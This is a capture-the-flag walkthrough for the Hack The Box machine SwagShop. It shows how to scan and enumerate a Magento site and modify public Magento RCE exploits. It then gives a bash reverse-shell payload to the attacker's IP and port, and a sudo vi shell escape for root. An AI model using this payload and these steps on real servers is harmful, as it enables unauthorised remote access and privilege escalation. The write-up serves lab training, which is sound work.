Hack The Box — SwagShop

Hey folks, today we have new machine from Hack The Box “Swagshop” which I think it’s very easy but the exploit codes and CVE’s are patched on the machine and need to be edited as we will see, let’s take a look at the machines info to get started…

As you can see it depends on CVE and similar to the real life, let’s start

Nmap Scan

As usual, we will start our scan with nmap scan to get all open ports and services to know what we should search and try to exploit

nmap -A -T4 -oG swag.gnmap

We have only 2 open ports ssh/http and the service which running on them is not vulnerable, I know that from the last boxes I’ve rooted, so let’s go to the website and try to enumerate it

Okay, after opening we got this default welcome message “as it says” and the Magento system which we can call it management system to make it easy for us to understand what’s this

For now, we will do 3 tasks:

  1. Try to check the source code for any credential leakage
  2. Try to brute-force the directories for the same purpose
  3. Try to search for public exploits for Magento

Let’s start…

  1. Source code enumeration

After we checking it we couldn’t find any useful information, hints or creds

2. Brute-forcing the directories

I’ve used gobuster for this task with almost 220K word, and we got these directories

But unfortunately! NO useful info

3. Searching for CVE

We will use searchsploit for this task and this tool grabs all the results from exploit-db website

Good, we have a bunch of exploits, let’s try the RCE which work with unauthenticated users

Download it and figure out that you have the admin path, and you should set your username and password as you can see

Let’s run it

Good, now we have an admin account, let’s try to login as admin

Good we have an admin dashboard

To be honest ! I searched a lot for any upload function and found one, but I can’t understand it and how it works, so I used searchsploit again to find any authenticated CVE, and it works.

So after downloading it I’ve spent almost ONE hour try to execute it, and it fails until I’ve discovered that in the formal walkthrough and Ippsec tells us that the exploit script need some edit work as we will see now

At the first enter your credentials at its variables as you can see, and delete the lines which I highlighted or commented them, and replace them with the lines which below of them, and you can get them from here

The next edit will be in a different line here, change 7d and replace it with 2y because there're no orders in the last 7 days “I don’t’ know why, but it is the instruction which I read”

Now it’s ready to work as this way python exploit.py <admin-path-url> <cmd> and the command will be like this

'bash -c "bash -i >& /dev/tcp/your-ip/port 0>&1"'

This payload will get us reverse shell while we're listening on the port which we entered in

Nice, we have a shell but in the user mode, Let’s try to get more privileges

Let’s try sudo -l to list all the users

And as you can see we have something which manage us ‘normal user’ to execute commands like the admin or the root by typing sudo vi /var/www/html/some_file_name and it will open this file, and after exiting from it, we get a root privileges

:!/bin/bash this command is used to exit from vi

We have the root.txt/user.txt now ❤

Congrats ❤

Stay in touch

LinkedIn | GitHub | Twitter

Offensive Security Enthusiast